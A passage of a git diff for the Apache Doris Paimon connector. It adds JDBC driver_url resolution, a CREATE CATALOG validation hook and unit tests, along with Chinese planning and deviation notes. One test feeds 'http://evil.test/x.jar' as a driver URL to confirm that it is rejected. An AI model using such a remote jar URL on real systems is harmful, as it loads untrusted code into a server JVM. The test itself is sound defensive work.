PaimonCatalogFactory.resolveDriverUrl(driverUrl, env)); + String driverClass = PaimonCatalogFactory.firstNonBlank( + properties, PaimonConnectorProperties.JDBC_DRIVER_CLASS); + if (driverClass != null) { + options.put("jdbc.driver_class", driverClass); + } + } return options; } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorPreCreateValidationTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorPreCreateValidationTest.java new file mode 100644 index 00000000000000..7e8cfcf64e9dd2 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorPreCreateValidationTest.java @@ -0,0 +1,153 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorValidationContext; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +/** + * Tests for {@link PaimonConnector#preCreateValidation} (rereview2 B-8b): a JDBC-flavor catalog + * with a {@code driver_url} must route it through the engine's + * {@link ConnectorValidationContext#validateAndResolveDriverPath} security gate at CREATE CATALOG, + * before the jar is ever loaded into the FE JVM. Mirrors {@code JdbcDorisConnector.preCreateValidation}. + * + *

      Offline: a hand-written {@link RecordingValidationContext} fake records each validated url and + * can simulate a rejected url. {@link RecordingConnectorContext} supplies the (unused-by-this-path) + * {@code ConnectorContext}. + */ +public class PaimonConnectorPreCreateValidationTest { + + private static PaimonConnector connector(Map props) { + return new PaimonConnector(props, new RecordingConnectorContext()); + } + + @Test + public void validatesJdbcDriverUrl() throws Exception { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + props.put("jdbc.driver_url", "mysql.jar"); + RecordingValidationContext ctx = new RecordingValidationContext(); + + connector(props).preCreateValidation(ctx); + + // WHY (BLOCKER B-8b): a jdbc driver_url is loaded into the FE JVM (URLClassLoader); CREATE + // CATALOG must route it through the engine's format / white-list / secure-path gate. MUTATION: + // dropping the preCreateValidation override -> validateAndResolveDriverPath never called -> red. + Assertions.assertEquals(Collections.singletonList("mysql.jar"), ctx.validatedDriverUrls); + } + + @Test + public void validatesPaimonJdbcDriverUrlAlias() throws Exception { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + props.put("paimon.jdbc.driver_url", "mysql.jar"); + RecordingValidationContext ctx = new RecordingValidationContext(); + + connector(props).preCreateValidation(ctx); + + Assertions.assertEquals(Collections.singletonList("mysql.jar"), ctx.validatedDriverUrls, + "the paimon.jdbc.driver_url alias must also be validated"); + } + + @Test + public void skipsValidationForNonJdbcFlavor() throws Exception { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "filesystem"); + props.put("jdbc.driver_url", "mysql.jar"); + RecordingValidationContext ctx = new RecordingValidationContext(); + + connector(props).preCreateValidation(ctx); + + Assertions.assertTrue(ctx.validatedDriverUrls.isEmpty(), + "non-JDBC flavors must not trigger driver-url validation"); + } + + @Test + public void skipsValidationWhenNoDriverUrl() throws Exception { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + RecordingValidationContext ctx = new RecordingValidationContext(); + + connector(props).preCreateValidation(ctx); + + Assertions.assertTrue(ctx.validatedDriverUrls.isEmpty(), + "a jdbc catalog without a driver_url uses the platform driver -> nothing to validate"); + } + + @Test + public void propagatesRejectedDriverUrl() { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + props.put("jdbc.driver_url", "http://evil.test/x.jar"); + RecordingValidationContext ctx = new RecordingValidationContext(); + ctx.reject = true; + + // WHY (BLOCKER B-8b): a disallowed url must FAIL CREATE CATALOG — the hook throws and the + // connector must let it propagate, not swallow it. MUTATION: catching the exception -> no + // throw -> red. + Assertions.assertThrows(IllegalArgumentException.class, + () -> connector(props).preCreateValidation(ctx)); + } + + /** Hand-written {@link ConnectorValidationContext} test double (no Mockito). */ + private static final class RecordingValidationContext implements ConnectorValidationContext { + final List validatedDriverUrls = new ArrayList<>(); + boolean reject; + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public String getProperty(String key) { + return null; + } + + @Override + public void storeProperty(String key, String value) { + } + + @Override + public String validateAndResolveDriverPath(String driverUrl) throws Exception { + validatedDriverUrls.add(driverUrl); + if (reject) { + throw new IllegalArgumentException("disallowed driver url: " + driverUrl); + } + return "file:///resolved/" + driverUrl; + } + + @Override + public String computeDriverChecksum(String driverUrl) { + return "deadbeef"; + } + + @Override + public void requestBeConnectivityTest(byte[] serializedDescriptor, int connectionTypeValue, + String testQuery) { + } + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 9cdf1b6c43594d..173c29f3e5d7ab 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -659,6 +659,121 @@ public void getScanNodePropertiesNoContextNoStorageProps() { "no context -> no normalized overlay"); } + // ---- FIX-JDBC-DRIVER-URL (B-8a): BE-bound driver_url resolution + paimon.jdbc.* alias ---- + + /** A ConnectorContext whose getEnvironment() returns a fixed map (for jdbc_drivers_dir resolution). */ + private static ConnectorContext envContext(Map env) { + return new ConnectorContext() { + @Override + public String getCatalogName() { + return "c"; + } + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public Map getEnvironment() { + return env; + } + }; + } + + @Test + public void backendOptionsResolveBareDriverUrl() { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + props.put("jdbc.driver_url", "mysql.jar"); + props.put("jdbc.driver_class", "com.mysql.cj.jdbc.Driver"); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), + envContext(Collections.singletonMap("jdbc_drivers_dir", "/opt/drivers"))); + + Map opts = provider.getBackendPaimonOptions(); + + // WHY (BLOCKER B-8a): BE does new URL(value) (JdbcDriverUtils.registerDriver); a bare + // "mysql.jar" throws MalformedURLException, so FE must ship a full scheme-bearing URL. + // MUTATION: forwarding the raw value -> "mysql.jar" (no scheme) -> red. + Assertions.assertEquals("file:///opt/drivers/mysql.jar", opts.get("jdbc.driver_url")); + Assertions.assertEquals("com.mysql.cj.jdbc.Driver", opts.get("jdbc.driver_class")); + } + + @Test + public void backendOptionsHonorPaimonJdbcAlias() { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + props.put("paimon.jdbc.driver_url", "mysql.jar"); + props.put("paimon.jdbc.driver_class", "com.mysql.cj.jdbc.Driver"); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), + envContext(Collections.singletonMap("jdbc_drivers_dir", "/opt/drivers"))); + + Map opts = provider.getBackendPaimonOptions(); + + // WHY (BLOCKER B-8a): the startsWith("jdbc.") filter drops the paimon.jdbc.* alias form + // entirely, so BE never receives the driver. The fix reads either alias and emits the + // canonical jdbc.* key (BE PaimonJdbcDriverUtils accepts both). MUTATION: dropping the alias + // -> driver_url/class absent -> red. + Assertions.assertEquals("file:///opt/drivers/mysql.jar", opts.get("jdbc.driver_url")); + Assertions.assertEquals("com.mysql.cj.jdbc.Driver", opts.get("jdbc.driver_class")); + Assertions.assertFalse(opts.containsKey("paimon.jdbc.driver_url"), + "the raw paimon.jdbc.* alias key must not be shipped to BE"); + } + + @Test + public void backendOptionsResolveWhenBothAliasesSet() { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + // Both alias forms present with DIFFERENT values. firstNonBlank(JDBC_DRIVER_URL) order is + // {paimon.jdbc.driver_url, jdbc.driver_url} -> the paimon.jdbc.* value wins (legacy priority). + props.put("paimon.jdbc.driver_url", "postgres.jar"); + props.put("jdbc.driver_url", "mysql.jar"); + props.put("paimon.jdbc.driver_class", "org.postgresql.Driver"); + props.put("jdbc.driver_class", "com.mysql.cj.jdbc.Driver"); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), + envContext(Collections.singletonMap("jdbc_drivers_dir", "/opt/drivers"))); + + Map opts = provider.getBackendPaimonOptions(); + + // WHY: the forwarding loop copies the raw jdbc.driver_url="mysql.jar"; the explicit + // alias-aware put must OVERRIDE it with the resolved paimon.jdbc.* value (priority parity), + // and the raw mysql.jar must NOT leak through. MUTATION: dropping the override (or flipping + // the alias priority) -> jdbc.driver_url ends as the raw/wrong "mysql.jar" -> red. + Assertions.assertEquals("file:///opt/drivers/postgres.jar", opts.get("jdbc.driver_url")); + Assertions.assertEquals("org.postgresql.Driver", opts.get("jdbc.driver_class")); + Assertions.assertFalse(opts.values().contains("mysql.jar"), + "the raw lower-priority alias value must not survive in the BE options"); + } + + @Test + public void backendOptionsPreserveSchemeBearingDriverUrl() { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "jdbc"); + props.put("jdbc.driver_url", "file:///custom/path/mysql.jar"); + props.put("jdbc.driver_class", "com.mysql.cj.jdbc.Driver"); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), envContext(Collections.emptyMap())); + + // A value already carrying a scheme is shipped unchanged (no double-prefixing). + Assertions.assertEquals("file:///custom/path/mysql.jar", + provider.getBackendPaimonOptions().get("jdbc.driver_url")); + } + + @Test + public void backendOptionsEmptyForNonJdbcFlavor() { + Map props = new HashMap<>(); + props.put("paimon.catalog.type", "filesystem"); + props.put("jdbc.driver_url", "mysql.jar"); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + props, new RecordingPaimonCatalogOps(), envContext(Collections.emptyMap())); + + // Regression guard: the driver_url logic must not leak into non-JDBC flavors. + Assertions.assertTrue(provider.getBackendPaimonOptions().isEmpty()); + } + // ---- FIX-SCHEMA-EVOLUTION (B-1a): native-reader schema dictionary ---- @Test diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index 04bc4f552f3c78..7f0c85c8a2e794 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -1323,3 +1323,13 @@ fi **M-10 deferred**:`Column.uniqueId=-1` 不影响 B-1a(history 直接从 paimon field-id 建,不经 Doris 列)→ 不穿 `ConnectorColumn.fieldId`/`ConnectorType` 嵌套 id。详 [DV-026](./deviations-log.md)。 **测**:连接器 `PaimonScanPlanProviderTest` +5 测(field-id/name carriage、嵌套 ARRAY/MAP/STRUCT 形 + struct child id、scalar tag、rename round-trip、**-1 entry 顶层 lowercase 而嵌套保 paimon-case**、非-FileStoreTable 跳过)。模块 222/0/0。真值闸=`test_paimon_full_schema_change.groovy`(CI-gated)。 + +## 24. FIX-JDBC-DRIVER-URL(B-8a + B-8b):**无新 SPI**(复用既有 validation hooks,记录在案) + +> task-list #4 原标「SPI?=maybe」;**修正为 `no`** —— 本 fix **零新 SPI surface**,纯连接器侧,复用两个**既有**未改的 hook。记录于此以闭合 RFC「SPI 改动登记」约定(结论:无改动)。[D-050](./decisions-log.md)。 + +**复用既有缝(无改动)**:① **B-8b 安全**——`Connector.preCreateValidation(ConnectorValidationContext)`(既有 default no-op、CREATE CATALOG 时由 `PluginDrivenExternalCatalog.checkWhenCreating` 调)+ `ConnectorValidationContext.validateAndResolveDriverPath(driverUrl)`(既有、`DefaultConnectorValidationContext`→`JdbcResource.getFullDriverUrl` 做 format/whitelist/secure-path);paimon override `preCreateValidation` 对 jdbc flavor 调之,**与 JDBC 参考连接器 `JdbcDorisConnector` 同模式**。② **B-8a 功能**——driver_url 的 BE 传输经**既有** `paimon.options_json`(`getScanNodeProperties` 建、`populateScanLevelParams`→`setPaimonOptions`→BE `params`);本 fix 只改其中 `jdbc.driver_url` 的**值**(resolved 而非裸)+ 认 `paimon.jdbc.*` 别名,传输管道不动。 + +**已知 SPI gap(不在本 fix close)**:scan-time driver-path 校验**无** `ConnectorContext` hook(连接器 scan-time 拿不到 `ConnectorValidationContext`)→ 校验仅 CREATE-time(FE-restart/ALTER 不复校),是 pre-existing fe-core 缝、全 plugin 连接器共有。用户定接受(CREATE-time parity),跨连接器 follow-up 须新 `ConnectorContext` 校验 hook + fe-core ALTER 路接 `preCreateValidation`。详 [DV-028](./deviations-log.md)。 + +**测**:连接器 `PaimonScanPlanProviderTest` +5(resolve 裸名、认 paimon.jdbc.* 别名、双别名优先序+override、保 scheme-bearing、非-jdbc 空)+ 新 `PaimonConnectorPreCreateValidationTest` +5(jdbc/别名 调校验、非-jdbc/无 driver_url 不调、reject 传播)。模块 232/0/0、fail-before 5/9 向红。真值闸=`test_paimon_jdbc_catalog`(CI-gated)。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index ba4cf690f31436..5c88882cb4ebee 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-050 | P5-fix#4 | **FIX-JDBC-DRIVER-URL(B-8a BLOCKER + B-8b 安全)作用域 = CREATE-time 校验 parity(用户签字,2026-06-11)**:JDBC flavor 连接器(a)`PaimonScanPlanProvider.getBackendPaimonOptions` 把 `driver_url` **裸**转发给 BE 且 `startsWith("jdbc.")` filter 丢 `paimon.jdbc.*` 别名 → BE `JdbcDriverUtils.registerDriver` 的 `new URL("mysql.jar")` 抛 `MalformedURLException`(B-8a 功能 BLOCKER);(b)driver_url 无 format/allow-list/secure-path 校验 + stale「paimon 不在 SPI_READY_TYPES」注释(B7 后已假,`CatalogFactory:51` 含 paimon)(B-8b 安全)。**修 = 纯连接器、零新 SPI**(复用既有 `Connector.preCreateValidation` + `ConnectorValidationContext.validateAndResolveDriverPath`):B-8a 在 `getBackendPaimonOptions` 用 `firstNonBlank(JDBC_DRIVER_URL)` 认两别名 + 抽出共享 `PaimonCatalogFactory.resolveDriverUrl`(FE 注册与 BE 选项同解析)发 canonical `jdbc.driver_url`(resolved)+`jdbc.driver_class`(镜像 legacy `PaimonJdbcMetaStoreProperties.getBackendPaimonOptions`);B-8b override `PaimonConnector.preCreateValidation` 对 jdbc flavor 调 `validateAndResolveDriverPath`(镜像 `JdbcDorisConnector`)+ 删 stale 注释。**4-lens clean-room review 确认 B-8a + CREATE-time B-8b 正确**,揪出**校验仅 CREATE-time**(FE-restart reload/ALTER CATALOG/scan-time 不复校)= **pre-existing fe-core 缝、所有 plugin 连接器共有(含 JDBC 参考连接器)、默认配置 permissive 无可绕**,legacy 更强(每 scan 经 getFullDriverUrl 复校)。**用户定 = 接受 CREATE-time parity**(vs 扩到 fe-core ALTER hook + scan-time 校验 SPI——触 fe-core+全连接器+ALTER 可能触发 BE 连通测,非 surgical)→ 登 [DV-028](./deviations-log.md)(CREATE-time-only 校验 gap + 跨连接器 follow-up)+ [DV-029](./deviations-log.md)(简化 resolver + BE-side user/password/uri 别名 out-of-scope)。守门:模块 232/0/0、checkstyle 0、import-gate 净、fail-before 5/9 向红。真值闸=`test_paimon_jdbc_catalog`(CI-gated)。设计 [`P5-fix-JDBC-DRIVER-URL-design.md`](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) | 2026-06-11 | ✅ | | D-049 | P5-fix#3 | **FIX-SCHEMA-EVOLUTION(B-1a BLOCKER + M-10 MAJOR)= Design C「连接器直建 thrift schema 字典」(用户签字,2026-06-11;M-10 deferred)**:翻闸后 native(ORC/Parquet) 读丢 paimon schema-evolution——连接器只发 per-file `TPaimonFileDesc.schema_id`、从不设 scan 级 `TFileScanRangeParams.current_schema_id`/`history_schema_info` → BE `table_schema_change_helper.h:219-237` 走 `!__isset` 分支退化**名匹配** → schema-evolved(改名/重排)表旧 schema 文件**静默错行/读 NULL**(JNI 路不受影响、native 是默认)。**关键事实**(5 层 trace + BE `table_schema_change_helper.cpp:312-430`):field-id 匹配路 BE 只读 `TField.{id,name,type.type 当 nested-vs-scalar tag}`、**从不读 Doris Type 也不读 tuple descriptor** → 连接器可**直建** `TSchema`(`org.apache.doris.thrift.*` import-legal)、**无需 Doris Type/无新 SPI**;`Column.uniqueId`(M-10) 仅当 FE 从 Doris 列建 history 才有关、直接从 paimon `DataField.id()` 建则 B-1a 独立于 M-10。**用户定 = Design C(vs Design B「穿 ConnectorColumn/ConnectorType field-id + fe-core ExternalUtil 建」)**:连接器在 `getScanNodeProperties` 从 live(snapshot-pinned)表建 `current_schema_id=-1`+`history_schema_info`(-1 entry=pinned schema、外加每个 `SchemaManager.listAllIds()` 提交 schema)→ base64 thrift carrier prop 经既有 `populateScanLevelParams` SPI hook(复用 DV-006 同缝)落 params。**零新 SPI surface**(task-list 原标「SPI?=yes」修正为 no)、连接器局部、最小 blast radius;M-10(`Column.uniqueId=-1`)**deferred**(rereview2 §4 已证伪 standalone repro、无消费者,[DV-026](./deviations-log.md))。**3-lens clean-room review 揪出 2 真 BLOCKER(均在 -1 entry,已修+复验 clean)**:① 列名 casing(BE verbatim key vs lowercase slot name + `current_schema_id=-1` 永不走 ConstNode 快路 → 大小写混合列即崩、连未演化表都回归)→ 修 = -1 entry **只** lowercase 顶层名(default-locale,byte-match slot 产出方+legacy `parseSchema:507`;嵌套 struct 名保 paimon-case=legacy `PaimonUtil:302` 非对称);② 时间旅行(-1 entry 取 `schemaManager.latest()` 绝对最新、但 tuple 用 pinned schema → 改名列崩/错行)→ 修 = -1 entry 取 `((FileStoreTable)table).schema()`(pinned)、guard `DataTable`→`FileStoreTable`。MINOR(eager 读全 schema 无 cache)= 接受的 fail-loud 偏差 [DV-027](./deviations-log.md)。守门:模块 222/0/0(+5 schema-evo UT)、checkstyle 0、import-gate 净。真值闸=`test_paimon_full_schema_change.groovy`(CI-gated)。设计 [`P5-fix-SCHEMA-EVOLUTION-design.md`](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) | 2026-06-11 | ✅ | | D-048 | P5-fix#2 | **FIX-STATIC-CREDS-BE(B-9 BLOCKER)作用域 = full legacy-parity 替换(用户签字,2026-06-11)**:翻闸后 paimon 连接器 `PaimonScanPlanProvider.getScanNodeProperties:372-381` 把静态 catalog 凭据/配置(`s3.`/`oss.`/`cos.`/`obs.`/`hadoop.`/`fs.`/`dfs.`/`hive.` 前缀)裸拷进 `location.`,fe-core bridge `PluginDrivenScanNode.getLocationProperties` 只剥前缀不归一化 → BE native(FILE_S3) reader 只认 `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_ENDPOINT`/`AWS_REGION`/`AWS_TOKEN`(`s3_util.cpp`)→ 私有桶 native 读拿不到凭据 403。是 review §9.3 凭据**第三道缝**(static→BE-scan,FIX-STORAGE-CREDS 修 catalog FileIO 缝、FIX-REST-VENDED 修 vended 缝,本缝两轮均漏)。legacy `PaimonScanNode.getLocationProperties:650-652` 仅返回 `CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesMap)`(canonical map)。**用户定 = 方案 A(full legacy-parity,非窄 object-store-only)**:新 SPI `ConnectorContext.getBackendStorageProperties()`(default 空,仅 paimon 调)= 引擎用 #1 已接线的 `storagePropertiesSupplier`(`catalogProperty.getStoragePropertiesMap()`)跑同一 `getBackendPropertiesFromStorageMap` → 连接器**整段**替换裸拷循环为该 overlay(vended overlay 仍后置、collision 胜,legacy 优先序)。object-store→`AWS_*`;HDFS→canonical(保留用户 `hadoop.`/`dfs.`/`fs.`/`juicefs.` override + 补 legacy 默认 `ipc.client.fallback-to-simple-auth-allowed` 等,**顺修 review §211 MINOR**);丢非-parity `hive.*` 裸键(legacy 本不发 scan location)。一处 SPI 调用替掉前缀循环、单一真相源、无漂移。**ANONYMOUS-leak 边角经 BE 证伪无回归**(`s3_util.cpp` v1:383/v2:448 显式 ak/sk 优先于 `cred_provider_type`,vended keys 在则永不走 Anonymous 支)。无 ctor 改、无连接器新 import(import-gate 净)。SPI RFC §22(E14)。测:fe-core `DefaultConnectorContextBackendStoragePropsTest`(2)+连接器 `PaimonScanPlanProviderTest`(3 改/增,red-check 2/3 向红);模块 217/0/0。设计 [`P5-fix-STATIC-CREDS-BE-design.md`](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md) | 2026-06-11 | ✅ | | D-039 | P5-D8 | **P5 paimon B4 E7 sys-table SPI 形状 = 复用 live fe-core SysTable 机制(用户签字,2026-06-10)**:RFC §10 的「sys-table 当 `$`-后缀普通表、连接器在 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」设计**从未落地**——live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(`BindRelation`/`DescribeCommand`/`ShowCreateTableCommand` 调用;iceberg + legacy-paimon 共用),RFC §10 已 stale。**用户定 = 复用 live 机制(非 RFC §10)**:① 连接器 SPI 加 `ConnectorTableOps.listSupportedSysTables` + `getSysTableHandle`(default no-op,MC/jdbc/es/trino 不受影响);② fe-core `PluginDrivenExternalTable.getSupportedSysTables` 委托连接器(`listSupportedSysTables`),通用 `PluginDrivenSysTable extends NativeSysTable` + `PluginDrivenSysExternalTable`(**报 `PLUGIN_EXTERNAL_TABLE` 非连接器类型**,经现有 `SysTableResolver` 路由到 `PluginDrivenScanNode`)。否决 RFC §10 的 `getTableHandle("$suffix")`-路由(须改 `BindRelation`/`RelationUtil`、大 surface、偏离 iceberg)。RFC §10 标 superseded([DV-023](./deviations-log.md))。**T20(E5 MVCC)置于 B4** = 连接器侧 groundwork(inert until B5 wires fe-core MvccTable 消费者;翻闸 gated on B5 故 inert capability 不达用户,安全)。设计 `tasks/P5-paimon-migration.md` §批次 B4 | 2026-06-10 | ✅ | diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 445889a5c51bbb..73889c9aaffbb5 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,12 @@ ## 📋 索引 -> 时间倒序;当前共 **27** 项。 +> 时间倒序;当前共 **29** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-028 | P5-fix#4 FIX-JDBC-DRIVER-URL:driver_url 安全校验**仅 CREATE CATALOG**(`PaimonConnector.preCreateValidation`→`ConnectorValidationContext.validateAndResolveDriverPath`),**FE-restart reload / ALTER CATALOG / scan-time 不复校**——与 legacy 分歧(legacy `getBackendPaimonOptions`→`JdbcResource.getFullDriverUrl` 每 scan 复校 format/whitelist/secure-path)。根因 = pre-existing **fe-core 架构缝**、非本 fix/非 paimon 专属:`CatalogFactory:164` replay(`isReplay=true`) 跳 `checkWhenCreating`→`preCreateValidation` 不跑;`PluginDrivenExternalCatalog.checkProperties`(ALTER 路) 只调 `validateProperties`(无 driver 校验)、不调 `preCreateValidation`;`getBackendPaimonOptions` 仅 resolve 不 validate(连接器 scan-time 只有 `ConnectorContext`、无 driver-path 校验 hook)。**与 JDBC 参考连接器 `JdbcDorisConnector` 完全 parity**(其亦 CREATE-time-only)。**用户定接受**([D-050]):默认配置 permissive(`secure_path="*"`/whitelist 空)无可绕,唯一暴露 = 硬化部署后**收紧** whitelist/secure-path 又**不重建** catalog。**复评/follow-up(跨连接器)**:若需 close,须 fe-core 改(ALTER 路 `checkProperties`→`preCreateValidation`,注意会触发 JDBC 连接器的 BE 连通测)+ scan-time 校验须新 `ConnectorContext` SPI hook——影响全 plugin 连接器、独立工单 | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(CREATE-time parity,用户接受+跨连接器 follow-up)| +| DV-029 | P5-fix#4 FIX-JDBC-DRIVER-URL 两 scope-out(surgical):① 连接器 `PaimonCatalogFactory.resolveDriverUrl` 是 legacy `JdbcResource.getFullDriverUrl` 的**简化子集**——只做 scheme 解析(裸名→`file://{jdbc_drivers_dir}/{name}`),**不**做文件存在性 / legacy 旧 `jdbc_drivers/` 回退 / 云下载。常见情形(`mysql.jar`+默认 dir)两者等价;仅装旧 dir 的 jar 会 BE 找不到(pre-existing 简化、FE 注册路本就如此、复用未改)。② **BE-side `paimon.jdbc.{user,password,uri}` 别名丢弃不修**——同 `startsWith("jdbc.")` filter 也丢这些别名键,但 **BE 不需要**:`PaimonJniScanner.initTable` 从 `serialized_table` 反序列化整表、**不**从 options_json 重建 JdbcCatalog;BE 唯一消费 jdbc 选项处 `PaimonJdbcDriverUtils.registerDriverIfNeeded` 只读 driver_url/driver_class。legacy `getBackendPaimonOptions` 亦仅发 driver_url+driver_class(窄)。故 B-8a 只修 driver_url/class 即 parity(scope-critic lens LGTM 确认) | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(surgical scope-out,BE 经 trace 确认安全)| | DV-027 | P5-fix#3 FIX-SCHEMA-EVOLUTION:history_schema_info 用 **eager 全量** `SchemaManager.listAllIds()`+`schema(id)`(每 scan、**无 cache**),非 legacy 的 per-split 引用 schema 懒读+缓存(`PaimonScanNode.putHistorySchemaInfo`→`PaimonUtils.getSchemaCacheValue`)。理由:Design C 的 scan 级缝 `populateScanLevelParams` 拿不到 split 集(那是 `planScan` 才有),故无法只读引用到的 schema;listAllIds() 全集**保证**覆盖任意 native 文件的 `schema_id`(BE `table_schema_change_helper.h:259-263` 缺 entry 会 fail-loud `InternalError`,全集即杜绝)。**两点接受**:① perf——K 个 schema 版本= K 次小 JSON 读/scan(props 每 node 缓存一次、非 per-split);② 鲁棒性微回归——某**未被引用**的 schema-N JSON 瞬时不可读会令本 scan 失败(fail-loud 传播,镜像 legacy `putHistorySchemaInfo` 不吞异常),而 legacy 因只读引用 schema 不碰它、可完成。correctness-safe(全集是 legacy 引用集的超集、绝不触发 BE InternalError);review 评 MINOR。未来优化=引用集(需 split-aware 缝)或连接器侧 cache | [task-list #3](./task-list-P5-rereview2-fixes.md) / [P5-fix-SCHEMA-EVOLUTION 设计](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) / [D-049](./decisions-log.md) | 2026-06-11 | 🟢 已登记(MINOR perf+鲁棒性,接受 fail-loud)| | DV-026 | P5-fix#3:**M-10(`Column.uniqueId=-1`)deferred 不修**(task-list #3 原含 M-10)。Design C 直接从 paimon `DataField.id()` 建 `history_schema_info` 的 `TField.id`,B-1a(field-id 匹配)**完全独立于** Doris `Column.uniqueId` → M-10 对 B-1a correctness 无关。rereview2 §4 已 majority-refute M-10 standalone repro(BE field-id 路不读 tuple descriptor、唯一 legacy `Column.uniqueId` 消费者 `ExternalUtil.initSchemaInfo` 经 legacy scan node 翻闸后已死)→ 无 demonstrated user-visible 消费者。故 deferred(非本 fix 必需、Design C 不穿 ConnectorColumn/ConnectorType field-id channel)。**复评触发**:若未来出现 field-id 消费者(如 SPI-on iceberg/hudi 经 `ExternalUtil` 从 Doris 列建 history schema),须重启 M-10(穿 `ConnectorColumn.fieldId`+`ConnectorType` 嵌套 id+`ConnectorColumnConverter.setUniqueId` 递归)| [task-list #3](./task-list-P5-rereview2-fixes.md) / [P5-fix-SCHEMA-EVOLUTION 设计](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) / [D-049](./decisions-log.md) | 2026-06-11 | 🟢 已登记(M-10 deferred,无消费者)| | DV-025 | P5-fix-FIX-URI-NORMALIZE:`normalizeStorageUri` 用 catalog **静态** `getStoragePropertiesMap()` 做 scheme 归一化,**非** legacy `PaimonScanNode:171` 的 vended-overlay 版(`VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials`)。理由:scheme 归一化(oss/cos/obs/s3a→s3、bucket.endpoint→bucket)与 vended 凭据正交——vended 只改 `AWS_*` 键、不改 scheme/bucket 形;只要 warehouse endpoint 静态配置(OSS/COS/OBS 绝大多数情形必配,否则连不上)静态 map 即含该 type entry,归一化与 legacy 等价。唯一分歧 = *纯-vended、无静态存储配* 的 REST catalog:静态 map 可能缺 entry → `LocationPath.of` fail-loud 抛(legacy vended-overlay 版不抛)。该边角**与凭据缝重叠、本 fix 显式不收**,归 task-list #2 `FIX-STATIC-CREDS-BE` / `FIX-REST-VENDED`(review §9.3 三道凭据缝之一)。fail-loud 优于静默送裸 `oss://`(后者 DV 错行)| [task-list #1](./task-list-P5-rereview2-fixes.md) / [P5-fix-URI-NORMALIZE 设计](./tasks/designs/P5-fix-URI-NORMALIZE-design.md) / [SPI RFC §21](./01-spi-extensions-rfc.md) | 2026-06-11 | 🟢 已登记(scope 决策,凭据边角归 #2/#3)| diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index f69ba8e8353559..6f1d2fab921763 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -25,8 